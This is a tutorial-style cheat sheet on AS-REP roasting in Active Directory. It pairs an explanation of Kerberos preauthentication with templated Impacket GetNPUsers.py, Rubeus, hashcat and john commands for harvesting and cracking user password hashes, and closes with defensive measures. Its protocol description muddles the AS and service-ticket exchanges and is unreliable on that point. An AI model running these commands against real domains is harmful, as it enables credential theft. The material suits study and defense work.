AS-REP Roasting

AS-REP Roasting

Overview

AS-REP roasting is a form of attack on the Kerberos authentication protocol that takes advantage of a known weakness in the protocol that can be exploited during initial authentication with a Key Distribution Center (KDC). AS-REP roasting allows a malicious actor to retrieve the password hash of any Kerberos user accounts that have the Do not require Kerberos preauthentication option enabled.

we have : user account with any privilege

we acquire : credentials for the anther user “doesn’t require pre-authentication”

About AS-REP

AS-REP is a Kerberos message type that refers to an "Authentication Service" (AS) response message. It is transmitted between a kerberos server and client as part of the exchange of credentials needed to access a service. To generate an AS-REP message, first, the kerberos client asks to Kerberos Domain Controller (KDC) for a Ticket Granting Ticket (TGT) and a session key that are needed to obtain credentials for other services.

After the ticket granting ticket has been issued, the service ticket can be requested. That involves two messages: an AS_REQ sent from the client to the kerberos server and an AS_REP, which is sent in response to the AS_REQ.

The AS-REP message contains the TGT and a session key which is used to request access to the intended service. The session key is encrypted with the requesting user’s password. AS-REP attacks are designed to extract and crack the session key, revealing the requesting account's password."

How to Exploit ?

1. Scan for user accounts doesn’t require pre-authentication

With Impacket example GetNPUsers.py: "attempt to harvest the non-preauth AS_REP responses for a given list of usernames.”

# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

With Rubeus:

# check ASREPRoast for all users in current domain
.\\Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

2. Cracking with dictionary of passwords

hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>

john --wordlist=<passwords_file> <AS_REP_responses_file>

Protections from AS-REP Roasting

• Identify Accounts that Do Not Require Preauthentication The obvious protections from this type of attack are to find and remove any instances of user accounts that are set to not require Kerberos preauthentication.

• Password Strength Another strong protection from this type of attack is to leverage long, complex passwords that will not be found in breached password dictionaries. Using fine-grained password policies especially for privileged accounts is a great first step. For additional protection against commonly breached passwords you can look at Enterprise Password Enforcer.

• AD Privileges It’s also important to understand what users have privileges to your AD user accounts and can enable this UAC value, as it can be enabled for just enough time to obtain the AS-REP hash, and then turned off again.

Resources

• https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/

• https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

• https://www.youtube.com/watch?v=EVdwnBFtUtQ